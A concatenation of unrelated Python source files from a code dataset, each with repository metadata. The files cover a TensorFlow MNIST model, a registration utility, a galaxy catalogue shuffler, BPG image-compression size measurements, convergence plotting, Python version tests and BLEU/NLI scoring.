Y2 = layers.conv2d(Y1, num_outputs=12, kernel_size=[5, 5], stride=2, biases_initializer=biasInit)
Y3 = layers.conv2d(Y2, num_outputs=24, kernel_size=[4, 4], stride=2, biases_initializer=biasInit)
Y4 = layers.flatten(Y3)
Y5 = layers.relu(Y4, 200, biases_initializer=biasInit)
# to deactivate dropout on the dense layer, set keep_prob=1
Y5d = layers.dropout(Y5, keep_prob=0.75, noise_shape=None, is_training=mode==learn.ModeKeys.TRAIN)
Ylogits = layers.linear(Y5d, 10)
predict = tf.nn.softmax(Ylogits)
classes = tf.cast(tf.argmax(predict, 1), tf.uint8)
loss = conv_model_loss(Ylogits, Y_, mode)
train_op = conv_model_train_op(loss, mode)
eval_metrics = conv_model_eval_metrics(classes, Y_, mode)
return learn.ModelFnOps(
mode=mode,
# You can name the fields of your predictions dictionary as you like.
predictions={"predictions": predict, "classes": classes},
loss=loss,
train_op=train_op,
eval_metric_ops=eval_metrics
)
# Configuration to save a checkpoint every 1000 steps.
training_config = tf.contrib.learn.RunConfig(save_checkpoints_secs=None, save_checkpoints_steps=1000, gpu_memory_fraction=0.9)
estimator=learn.Estimator(model_fn=conv_model, model_dir="checkpoints", config=training_config)
# Trains for 10000 additional steps saving checkpoints on a regular basis. The next
# training will resume from the checkpoint unless you delete the "checkpoints" folder.
estimator.fit(input_fn=train_data_input_fn, steps=10000)
estimator.evaluate(input_fn=eval_data_input_fn, steps=1)
digits = estimator.predict(input_fn=predict_input_fn)
for digit in digits:
print(str(digit['classes']), str(digit['predictions'])) | 47.306306 | 126 | 0.754713 | 795 | 5,251 | 4.85283 | 0.359748 | 0.01633 | 0.032659 | 0.027994 | 0.131674 | 0.099015 | 0.075946 | 0.062727 | 0.031104 | 0.031104 | 0 | 0.024764 | 0.154066 | 5,251 | 111 | 127 | 47.306306 | 0.843764 | 0.358408 | 0 | 0.034483 | 0 | 0 | 0.018891 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12069 | false | 0 | 0.172414 | 0.103448 | 0.413793 | 0.017241 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
7a5631563abbee09e3dc6aba4770d276955ccd69 | 1,018 | py | Python | utils.py | yinziyan1206/nado_unit | 1b4f7ebbcbff05c8feafe1abbb9bd26fc1e3e75a | [
"MIT"
] | null | null | null | utils.py | yinziyan1206/nado_unit | 1b4f7ebbcbff05c8feafe1abbb9bd26fc1e3e75a | [
"MIT"
] | null | null | null | utils.py | yinziyan1206/nado_unit | 1b4f7ebbcbff05c8feafe1abbb9bd26fc1e3e75a | [
"MIT"
] | null | null | null | #!/usr/bin/python3
__author__ = 'ziyan.yin'
from threading import Lock
from typing import Dict
from .unit import units
locks: Dict[str, Lock] = dict()
def synchronized(func):
key = f"{repr(func)}"
if key not in locks:
locks[key] = Lock()
def wrapper(*args, **kwargs):
with locks[key]:
return func(*args, **kwargs)
return wrapper
def register(cls):
module = '.'.join(cls.__module__.split('.')[1:])
if module not in units:
units[module] = dict()
units[module][cls.__name__] = cls
return cls
def priority(level: int):
if not 0 < level < 5:
level = 1
def wrapper(cls):
cls.level = level
return cls
return wrapper
def get_unit(router: str = 'common', method: str = ''):
if router:
if router in units and method in units[router]:
return True, units[router][method]
else:
return False, 'can not find service {0}[{1}]'.format(router, method)
return False, ''
| 20.36 | 80 | 0.590373 | 134 | 1,018 | 4.38806 | 0.402985 | 0.035714 | 0.054422 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00955 | 0.279961 | 1,018 | 49 | 81 | 20.77551 | 0.792633 | 0.016699 | 0 | 0.121212 | 0 | 0 | 0.058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.515152 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7a565900a54a138a678990c731ee449abfbb87b7 | 7,107 | py | Python | code/satellite_shuffler.py | mjvakili/gambly | 611765bc42d8c42d76558b486c4025532155036a | [
"MIT"
] | 1 | 2016-01-29T20:57:07.000Z | 2016-01-29T20:57:07.000Z | code/satellite_shuffler.py | mjvakili/Gamble | 611765bc42d8c42d76558b486c4025532155036a | [
"MIT"
] | 2 | 2017-03-06T17:55:39.000Z | 2018-10-11T16:15:01.000Z | code/satellite_shuffler.py | mjvakili/Gamble | 611765bc42d8c42d76558b486c4025532155036a | [
"MIT"
] | null | null | null | '''
This is copied from Duncan Campbell's
galactic conformity repo:
https://github.com/duncandc/galactic_conformity/blob/d34499507558d90c68e50adb559aa3671d1cc420/mock/shuffling/make_satrel_shuffle_hearin_mocks.py
'''
import numpy as np
import h5py
import sys
from astropy.io import ascii
from astropy import table
def main(Mr, sham_style):
#location of data directory
filepath = '/export/bbq2/mj/'
savepath = '/export/bbq2/mj/'
if sham_style == "tailored":
catalogue = 'bolshoi_new_a1.00231.mag_r.source_blanton.scatter0.17.tailored_Mr'+str(Mr)
elif sham_style == "Vpeak":
catalogue = 'bolshoi_new_a1.00231.mag_r.source_blanton.scatter0.15.Vpeaj_Mr'+str(Mr)
f = h5py.File(filepath+catalogue+'.hdf5', 'r')
GC = f.get("data")
GC = np.array(GC)
#make new catalogue and copy over values from original catalogue
dtype = GC.dtype.descr
dtype = np.dtype(dtype)
GC_new = np.recarray((len(GC),), dtype=dtype)
GC_new.fill(0.0)
GC_new = np.array(GC, copy=True)
#identify central galaxies, host haloes
centrals = np.where(GC['upid'] == -1)[0] #indices of the central galaxies
print 'number of centrals, host haloes:', len(centrals)
satellites = np.where(GC['upid'] != -1)[0] #indices of the satellite galaxies
print 'number of satellites, host haloes:', len(satellites)
#define mass bins, and which central are in each mass bin
mass_bins = np.arange(8.0,16.0,0.1) #log mass bins
mass_hist, bins = np.histogram(GC['host_mass'][centrals], bins=mass_bins) #group histogram by log(host_mass)
mass_bin_ind = np.digitize(GC['host_mass'][centrals], bins=mass_bins) #indices of groups in log(host_mass) bins
#go through each mass bin
for i in range(0,len(mass_bins)-1):
print i, 'mass bin:', mass_bins[i], mass_bins[i+1]
ind = np.where(mass_bin_ind==i+1)[0] #indices of host haloes in this mass bin
if len(ind)>0: #if there are any haloes in the mass bin
print 'number of groups:', len(ind)
ids = GC['id'][centrals[ind]]
sat_galaxy_members = np.in1d(GC['upid'],ids) #satellite galaxies in the mass bin
sat_galaxy_members = np.where(sat_galaxy_members)[0] #indicies of galaxies
cen_galaxy_members = np.in1d(GC['id'],ids) #central galaxies in the mass bin
cen_galaxy_members = np.where(cen_galaxy_members)[0] #indicies of galaxies
galaxy_members = np.hstack((sat_galaxy_members,cen_galaxy_members))
print 'number of galaxies:', len(galaxy_members)
satellite_members = np.where(GC['upid'][galaxy_members]!=-1)[0] #satellites
satellite_members = galaxy_members[satellite_members] #indices of satellites
central_members = np.where(GC['upid'][galaxy_members]==-1)[0] #centrals
central_members = galaxy_members[central_members] #indices of centrals
print 'number of centrals:', len(central_members)
print 'number of satellites:', len(satellite_members)
print 'check:', len(central_members) + len(satellite_members) == len(galaxy_members)
#shuffle list of host haloes in mass bin
shuffle = np.random.permutation(np.arange(0,len(central_members),1))
shuffled_central_members = central_members[shuffle]
unshuffle = np.arange(0,len(central_members),1)
ran_index = np.random.random_integers(0,len(central_members)-1,len(satellite_members))
#shuffle satellite systems --> leave gal props alone, change halo props
for i in range(0,len(satellite_members)):
print "\r",i,
sys.stdout.flush()
old_host_ID = GC['upid'][satellite_members[i]] #old host halo ID
old_host_ind = np.where(GC['id']==old_host_ID)[0] #index of old host central
new_host_ind = ran_index[i] #location in central members list
new_host_ind = central_members[new_host_ind] #new host index
#assign a new host properties
GC_new['upid'][satellite_members[i]] = GC['id'][new_host_ind]
GC_new['host_mass'][satellite_members[i]] = GC['host_mass'][new_host_ind]
GC_new['mvir'][satellite_members[i]] = GC['mvir'][new_host_ind]
GC_new['rvir'][satellite_members[i]] = GC['rvir'][new_host_ind]
#calculate satellite positions
x_new_cen = GC['x'][new_host_ind]
y_new_cen = GC['y'][new_host_ind]
z_new_cen = GC['z'][new_host_ind]
x_old_cen = GC['x'][old_host_ind]
y_old_cen = GC['y'][old_host_ind]
z_old_cen = GC['z'][old_host_ind]
GC_new['x'][satellite_members[i]] = GC_new['x'][satellite_members[i]] - x_old_cen + x_new_cen
GC_new['y'][satellite_members[i]] = GC_new['y'][satellite_members[i]] - y_old_cen + y_new_cen
GC_new['z'][satellite_members[i]] = GC_new['z'][satellite_members[i]] - z_old_cen + z_new_cen
#calculate satellite velocities
Vx_new_cen = GC['vx'][new_host_ind]
Vy_new_cen = GC['vy'][new_host_ind]
Vz_new_cen = GC['vz'][new_host_ind]
Vx_old_cen = GC['vx'][old_host_ind]
Vy_old_cen = GC['vy'][old_host_ind]
Vz_old_cen = GC['vz'][old_host_ind]
GC_new['vx'][satellite_members[i]] = GC_new['vx'][satellite_members[i]] - Vx_old_cen + Vx_new_cen
GC_new['vy'][satellite_members[i]] = GC_new['vy'][satellite_members[i]] - Vy_old_cen + Vy_new_cen
GC_new['vz'][satellite_members[i]] = GC_new['vz'][satellite_members[i]] - Vz_old_cen + Vz_new_cen
#Fix any boundary condition issues, Lbox=250 Mpc
fix = np.where(GC_new['x'] < 0.0)[0]
GC_new['x'][fix] = 250.0 - np.absolute(GC_new['x'][fix])
fix = np.where(GC_new['y'] < 0.0)[0]
GC_new['y'][fix] = 250.0 - np.absolute(GC_new['y'][fix])
fix = np.where(GC_new['z'] < 0.0)[0]
GC_new['z'][fix] = 250.0 - np.absolute(GC_new['z'][fix])
fix = np.where(GC_new['x'] > 250.0)[0]
GC_new['x'][fix] = GC_new['x'][fix] - 250.0
fix = np.where(GC_new['y'] > 250.0)[0]
GC_new['y'][fix] = GC_new['y'][fix] - 250.0
fix = np.where(GC_new['z'] > 250.0)[0]
GC_new['z'][fix] = GC_new['z'][fix] - 250.0
catalogue = catalogue+'_satrel_shuffle'
print 'saving hdf5 version of the catalogue...'
filename = catalogue
print filename
f = h5py.File(savepath+filename+'.hdf5', 'w')
dset = f.create_dataset(catalogue, data=GC_new)
f.close()
print 'saving ascii version of the catalogue...'
print filename
data_table = table.table.Table(data=GC_new)
ascii.write(data_table, savepath+filename+'.dat')
print data_table
if __name__ == '__main__':
for sham_style in ['tailored' , 'Vpeak']:
for mr in [18.0,18.5,19.5,20.5,20.0]:
main(mr)
| 52.257353 | 144 | 0.622485 | 1,051 | 7,107 | 3.978116 | 0.18078 | 0.04664 | 0.069122 | 0.045444 | 0.277685 | 0.235111 | 0.10763 | 0.064578 | 0.054054 | 0.024396 | 0 | 0.02872 | 0.240608 | 7,107 | 135 | 145 | 52.644444 | 0.74597 | 0.130716 | 0 | 0.018692 | 0 | 0 | 0.10253 | 0.021417 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.046729 | null | null | 0.130841 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a5ee84e6d9c767a419743056d427e75818c7b96 | 5,957 | py | Python | bpg_file_size.py | yoshitomo-matsubara/supervised-compression | 6df52222c6407e8fac7d34d5e25b218910f686cf | [
"Apache-2.0"
] | 12 | 2021-11-02T00:38:47.000Z | 2022-03-15T12:57:03.000Z | bpg_file_size.py | yoshitomo-matsubara/supervised-compression | 6df52222c6407e8fac7d34d5e25b218910f686cf | [
"Apache-2.0"
] | null | null | null | bpg_file_size.py | yoshitomo-matsubara/supervised-compression | 6df52222c6407e8fac7d34d5e25b218910f686cf | [
"Apache-2.0"
] | 1 | 2022-02-22T06:53:35.000Z | 2022-02-22T06:53:35.000Z | import argparse
import os
import numpy as np
from torchdistill.datasets.transform import CustomCompose, CustomRandomResize
from torchdistill.datasets.util import load_coco_dataset, build_transform
from torchvision.datasets import ImageFolder, VOCSegmentation
from torchvision.transforms import transforms
from custom.transform import BPG
def get_argparser():
parser = argparse.ArgumentParser(description='BPG file size for ImageNet and COCO segmentation datasets')
parser.add_argument('--dataset', required=True, choices=['imagenet', 'coco_segment', 'pascal_segment'],
help='ckpt dir path')
return parser
def compute_bpg_file_size_with_transform(dataset, quality):
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224)
])
bpg_codec = BPG(bpg_quality=quality, encoder_path='~/manually_installed/libbpg-0.9.8/bpgenc',
decoder_path='~/manually_installed/libbpg-0.9.8/bpgdec')
file_size_list = list()
for img in dataset:
img = transform(img[0])
img, file_size_kbyte = bpg_codec.run(img)
file_size_list.append(file_size_kbyte)
file_sizes = np.array(file_size_list)
print('BPG quality: {}, File size [KB]: {} ± {}'.format(quality, file_sizes.mean(), file_sizes.std()))
def compute_bpg_file_size_for_imagenet_dataset():
dataset = ImageFolder(root=os.path.expanduser('~/dataset/ilsvrc2012/val'))
compute_bpg_file_size_with_transform(dataset, 50)
compute_bpg_file_size_with_transform(dataset, 45)
compute_bpg_file_size_with_transform(dataset, 40)
compute_bpg_file_size_with_transform(dataset, 35)
compute_bpg_file_size_with_transform(dataset, 30)
compute_bpg_file_size_with_transform(dataset, 25)
compute_bpg_file_size_with_transform(dataset, 20)
compute_bpg_file_size_with_transform(dataset, 15)
compute_bpg_file_size_with_transform(dataset, 10)
compute_bpg_file_size_with_transform(dataset, 5)
compute_bpg_file_size_with_transform(dataset, 0)
def compute_bpg_file_size(dataset, quality):
file_size_list = list()
bpg_codec = BPG(bpg_quality=quality, encoder_path='~/manually_installed/libbpg-0.9.8/bpgenc',
decoder_path='~/manually_installed/libbpg-0.9.8/bpgdec')
for img in dataset:
img = img[0]
img, file_size_kbyte = bpg_codec.run(img)
file_size_list.append(file_size_kbyte)
file_sizes = np.array(file_size_list)
print('BPG quality: {}, File size [KB]: {} ± {}'.format(quality, file_sizes.mean(), file_sizes.std()))
def compute_bpg_file_size_for_cocosegment_dataset():
split_config = {
'images': '~/dataset/coco2017/val2017',
'annotations': '~/dataset/coco2017/annotations/instances_val2017.json',
'annotated_only': False,
'is_segment': True,
'transforms_params': [
{'type': 'CustomRandomResize', 'params': {'min_size': 520, 'max_size': 520}}
]
}
is_segment = split_config.get('is_segment', False)
compose_cls = CustomCompose if is_segment else None
transforms = build_transform(split_config.get('transforms_params', None), compose_cls=compose_cls)
dataset = load_coco_dataset(split_config['images'], split_config['annotations'],
split_config['annotated_only'], split_config.get('random_horizontal_flip', None),
is_segment, transforms, split_config.get('bpg_quality', None))
compute_bpg_file_size(dataset, 50)
compute_bpg_file_size(dataset, 45)
compute_bpg_file_size(dataset, 40)
compute_bpg_file_size(dataset, 35)
compute_bpg_file_size(dataset, 30)
compute_bpg_file_size(dataset, 25)
compute_bpg_file_size(dataset, 20)
compute_bpg_file_size(dataset, 15)
compute_bpg_file_size(dataset, 10)
compute_bpg_file_size(dataset, 5)
compute_bpg_file_size(dataset, 0)
def compute_bpg_file_size_with_transform_and_target(dataset, transform, quality):
bpg_codec = BPG(bpg_quality=quality, encoder_path='~/manually_installed/libbpg-0.9.8/bpgenc',
decoder_path='~/manually_installed/libbpg-0.9.8/bpgdec')
file_size_list = list()
for img in dataset:
img, _ = transform(img[0], img[1])
img, file_size_kbyte = bpg_codec.run(img)
file_size_list.append(file_size_kbyte)
file_sizes = np.array(file_size_list)
print('bpg quality: {}, File size [KB]: {} ± {}'.format(quality, file_sizes.mean(), file_sizes.std()))
def compute_bpg_file_size_for_pascalsegment_dataset():
dataset = VOCSegmentation(root=os.path.expanduser('~/dataset/'), image_set='val', year='2012')
transform = CustomCompose([
CustomRandomResize(min_size=512, max_size=512)
])
compute_bpg_file_size_with_transform_and_target(dataset, transform, 50)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 45)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 40)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 35)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 30)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 25)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 20)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 15)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 10)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 5)
compute_bpg_file_size_with_transform_and_target(dataset, transform, 0)
if __name__ == '__main__':
argparser = get_argparser()
args = argparser.parse_args()
if args.dataset == 'imagenet':
compute_bpg_file_size_for_imagenet_dataset()
elif args.dataset == 'coco_segment':
compute_bpg_file_size_for_cocosegment_dataset()
else:
compute_bpg_file_size_for_pascalsegment_dataset()
| 44.789474 | 113 | 0.737787 | 791 | 5,957 | 5.14665 | 0.166877 | 0.119872 | 0.116188 | 0.185704 | 0.671334 | 0.642103 | 0.576026 | 0.404323 | 0.404323 | 0.404323 | 0 | 0.024825 | 0.161491 | 5,957 | 132 | 114 | 45.128788 | 0.78959 | 0 | 0 | 0.223214 | 0 | 0 | 0.136646 | 0.061272 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.071429 | 0 | 0.142857 | 0.026786 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a63ebc8faf56252bf51b4bbf71aad27de4c9ad0 | 5,492 | py | Python | postRunScripts/convergence.py | burks-pub/gecco2015 | 2a7e32381d2e978e52c824d8348cf106619bb795 | [
"BSD-2-Clause"
] | null | null | null | postRunScripts/convergence.py | burks-pub/gecco2015 | 2a7e32381d2e978e52c824d8348cf106619bb795 | [
"BSD-2-Clause"
] | null | null | null | postRunScripts/convergence.py | burks-pub/gecco2015 | 2a7e32381d2e978e52c824d8348cf106619bb795 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/python
import sys
import os
import re
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import numpy as np
import scipy.stats as stats
#Matplotlib font stuff (for making figures with legible text)
font = {'size': '9'}
matplotlib.rc('font', **font)
#USE TYPE 1 FONTS!!
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
matplotlib.rcParams['text.usetex'] = True
#This script takes a set of directories and gets the average ending evaluation#
#including error bars for runs that found the optimal solution. This works on
#simple and layered population data. In the case of layered, we take the max
#fitness of all layers for each point in time.
#Colors to plot in...
COLORS = ["#336699", "#993300", "#999933", "#666699", "#CC9933", "#006666", "#99CCFF"]
#Plots the average convergence evals in a bar chart for each of the algorithms
#Also returns the list of ending evals for each algorithm so we can do stats tests
def plotConvergence(resultsDirs, outDir, labels):
#Make sure the output directory exists
if not os.path.exists(outDir):
os.makedirs(outDir)
allEndingEvals = [] #[list of ending evals for each successful run in each dir]
for i in range(len(resultsDirs)):
resultsDir = resultsDirs[i]
label = labels[i]
endingEvals = []
for dirname, dirs, files in os.walk(resultsDir):
for fName in files:
m = re.match("fitness([\d]+.*)", fName)
if m != None:
outFile = open(os.path.join(dirname, fName))
foundOptimal=False
#Go line-by-line and get the earliest perfect fitness
for line in outFile:
if not foundOptimal:
data = line.strip().split("\t")
#We have layered population data
if line.find(":") >= 0:
numEvals = long(data[1])
start = True
for lyrData in data[2:]:
avgFit, maxFit = [float(item) for item in lyrData.split(":")]
#See if the max fitness is 1.0
if maxFit == 1.0:
endingEvals.append(numEvals)
foundOptimal = True
break
#We have Simple population data
else:
numEvals = long(data[1])
maxFit, avgFit = [float(item) for item in data[2:]]
#See if the max fitness is 1.0
if maxFit == 1.0:
endingEvals.append(numEvals)
foundOptimal = True
break
#Stop reading the file once we've found the optimal
if foundOptimal:
break
if len(endingEvals) > 0:
allEndingEvals.append(endingEvals)
#Get the averages and 95% confidence intervals
averages = []
cis = []
for endingEvals in allEndingEvals:
averages.append(np.average(endingEvals))
cis.append(1.96 * stats.sem(endingEvals))
#Plot the data
numAlgs = len(allEndingEvals)
ind = np.arange(numAlgs)
xTicks = [i + .3 for i in range(numAlgs)]
#Explicitly set the figure size
plt.figure(figsize=(3.0,2.0))
plt.bar(xTicks, averages, .5,
color= "grey", yerr=cis, ecolor="black", align="center")
plt.xticks(xTicks, labels)
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.ylabel('Mean Evaluations')
plt.savefig(os.path.join(outDir, "convergence.eps"), bbox_inches="tight")
#Return the collection of all ending evals
return allEndingEvals
#Does pairwise Mann-Whitney U tests for the ending evals for all experiment sets
#Writes the results in a table (matrix) form to outDir/convergencePVals.txt
#Also writes out all the averages to outDir/convergenceAverages.txt
def doStatsTests(allEndingEvals, outDir, labels):
#We need at least 2 sets to comparedd
if len(allEndingEvals) >= 1:
#Setup the output files
pValsFile = open("%s/convergencePVals.txt" %outDir, "w")
avgFile = open("%s/convergenceAverages.txt" %outDir, "w")
#Holds the "table" to print out to file
allPVals = []
#Do the pairwise comparisons
for i in range(len(allEndingEvals)-1):
#Calculate and write the average
avgEndingEvals = np.average(allEndingEvals[i])
avgFile.write("%s\t%s\n" %(labels[i], avgEndingEvals))
pVals = []
for j in range(len(allEndingEvals)):
if j > i: #only fill in the upper diag (lower is the same...)
zStat, pVal = stats.ranksums(allEndingEvals[i], allEndingEvals[j])
pVals.append("%.5f" %pVal)
else:
pVals.append("--")
allPVals.append(pVals)
#Add a header row of labels
pValsFile.write("\t" + "\t".join(labels) + "\n")
for i in range(len(allPVals)):
pValsFile.write(labels[i] + "\t" + "\t".join(allPVals[i]) + "\n")
#Calculate and write the average for the last alg
avgEndingEvals = np.average(allEndingEvals[-1])
avgFile.write("%s\t%s\n" %(labels[-1], avgEndingEvals))
#Done!
pValsFile.close()
avgFile.close()
#-------------- MAIN ------------------------
if __name__ == "__main__":
if len(sys.argv) != 4:
print "Usage convergence.py <INPUT_DIR_LIST (no spaces!)> <LABELS (no spaces!)> <OUTPUT_DIR>"
print "Example: convergence.py dir1,dir2,dir3 label1,label2,label3 outputDir"
quit()
#Directories from which we should get the results
resultsDirs = [dirname for dirname in sys.argv[1].split(",")]
labels = [label for label in sys.argv[2].split(",")]
#Output directory
outDir = sys.argv[3]
#Plot the convergence times
allEndingEvals = plotConvergence(resultsDirs, outDir, labels)
#Do pairwise Mann-Whitney U tests on each algorithm
if len(allEndingEvals) >= 1:
doStatsTests(allEndingEvals, outDir, labels)
| 28.604167 | 95 | 0.675346 | 761 | 5,492 | 4.856767 | 0.374507 | 0.00947 | 0.006494 | 0.011905 | 0.116342 | 0.0671 | 0.054113 | 0.042208 | 0.042208 | 0.042208 | 0 | 0.019323 | 0.199017 | 5,492 | 191 | 96 | 28.753927 | 0.820868 | 0.305171 | 0 | 0.148515 | 0 | 0 | 0.111465 | 0.013004 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.079208 | null | null | 0.019802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a685330ea7dc697bfb2bb1cb1fdd5db2f1757dd | 938 | py | Python | build/platform/python/tests/test_common.py | jochenater/catboost | de2786fbc633b0d6ea6a23b3862496c6151b95c2 | [
"Apache-2.0"
] | 6,989 | 2017-07-18T06:23:18.000Z | 2022-03-31T15:58:36.000Z | build/platform/python/tests/test_common.py | birichie/catboost | de75c6af12cf490700e76c22072fbdc15b35d679 | [
"Apache-2.0"
] | 1,978 | 2017-07-18T09:17:58.000Z | 2022-03-31T14:28:43.000Z | build/platform/python/tests/test_common.py | birichie/catboost | de75c6af12cf490700e76c22072fbdc15b35d679 | [
"Apache-2.0"
] | 1,228 | 2017-07-18T09:03:13.000Z | 2022-03-29T05:57:40.000Z | import subprocess
import pytest
from build.platform.python.tests import testlib
PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_version_matched(pyver):
testlib.check_python_version(pyver)
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_max_unicode_bytes(pyver):
cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)']
maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
assert int(maxunicode) > 65535, "Found UCS2 build"
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_imports(pyver):
imports = {
"2.7": ['pkg_resources'],
"3.4": [],
"3.5": ['pkg_resources'],
"3.6": [],
}
for imp in imports[pyver]:
subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
| 29.3125 | 87 | 0.678038 | 127 | 938 | 4.834646 | 0.433071 | 0.091205 | 0.102606 | 0.127036 | 0.350163 | 0.350163 | 0.350163 | 0.249186 | 0.172638 | 0 | 0 | 0.034308 | 0.160981 | 938 | 31 | 88 | 30.258065 | 0.74587 | 0.026652 | 0 | 0.136364 | 0 | 0 | 0.1427 | 0.023052 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.136364 | false | 0 | 0.363636 | 0 | 0.5 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
7a6ff3a5dd2da7887cb19a6ed2c1752b6e82d6cc | 2,834 | py | Python | src/score.py | alexwarstadt/phrase-analogies-large-vae | 2d5734ebdcdee916038f4654fd1a9339df3d2273 | [
"MIT"
] | 1 | 2021-04-22T14:52:10.000Z | 2021-04-22T14:52:10.000Z | src/score.py | alexwarstadt/phrase-analogies-large-vae | 2d5734ebdcdee916038f4654fd1a9339df3d2273 | [
"MIT"
] | 1 | 2021-04-26T22:28:42.000Z | 2021-04-28T19:09:11.000Z | src/score.py | alexwarstadt/phrase-analogies-large-vae | 2d5734ebdcdee916038f4654fd1a9339df3d2273 | [
"MIT"
] | 1 | 2021-08-06T14:55:16.000Z | 2021-08-06T14:55:16.000Z | import re
from nltk.translate import bleu_score as nltkbleu
from typing import List, Optional
import nli
def exact_calc(output, pred):
try:
assert isinstance(output, str) and isinstance(pred, str)
except AssertionError:
print("Error: Trying to compare {} and {}".format(output, pred))
return 0
return int(output.strip().lower() == pred.strip().lower())
def nli_calc(sent_c, predicted_d):
"""
sent_c is a list /tensor / series of c sentences, predicted_d a list/tensor/series of predicated d sentences.
Returns one of entailment/contradiction/neutral for each value in the series
"""
return nli.eval_nli(sent_c, predicted_d)
def nli_no_neutral_calc(sent_c, predicted_d):
"""
sent_c is a list /tensor / series of c sentences, predicted_d a list/tensor/series of predicated d sentences.
Returns one of entailment/contradiction (excluding neutral) for each value in the series
"""
return nli.eval_nli(sent_c, predicted_d, without_neutral=True)
# Following adapted from
# https://github.com/facebookresearch/ParlAI/blob/2426d74b93184689be5067bdbf99f1ba96748f7b/parlai/core/metrics.py
re_punc = re.compile(r'[!"#$%&()*+,-./:;<=>?@\[\]\\^`{|}~_\']')
def normalize_answer(s):
"""
Lower text and remove punctuation, articles and extra whitespace.
"""
s = s.lower()
s = re_punc.sub(" ", s)
# TODO: this could almost certainly be faster with a regex \s+ -> ' '
s = " ".join(s.split())
return s
def bleu_calc(output, pred):
try:
assert isinstance(output, str) and isinstance(pred, str)
except AssertionError:
print("Error: Trying to compare {} and {}".format(output, pred))
return
min_length = min(
len(normalize_answer(pred).split(" ")),
len(normalize_answer(output).split(" ")),
4,
)
return bleu_compute(pred, [output], k=min_length)
def bleu_compute(guess: str, answers: List[str], k: int = 4) -> float:
"""
Compute approximate BLEU score between guess and a set of answers.
"""
# Warning: BLEU calculation *should* include proper tokenization and
# punctuation etc. We're using the normalize_answer for everything though,
# so we're over-estimating our BLEU scores. Also note that NLTK's bleu is
# going to be slower than fairseq's (which is written in C), but fairseq's
# requires that everything be in arrays of ints (i.e. as tensors). NLTK's
# works with strings, which is better suited for this module.
weights = [1 / k for _ in range(k)]
score = nltkbleu.sentence_bleu(
[normalize_answer(a).split(" ") for a in answers],
normalize_answer(guess).split(" "),
smoothing_function=nltkbleu.SmoothingFunction(epsilon=1e-12).method1,
weights=weights,
)
return score
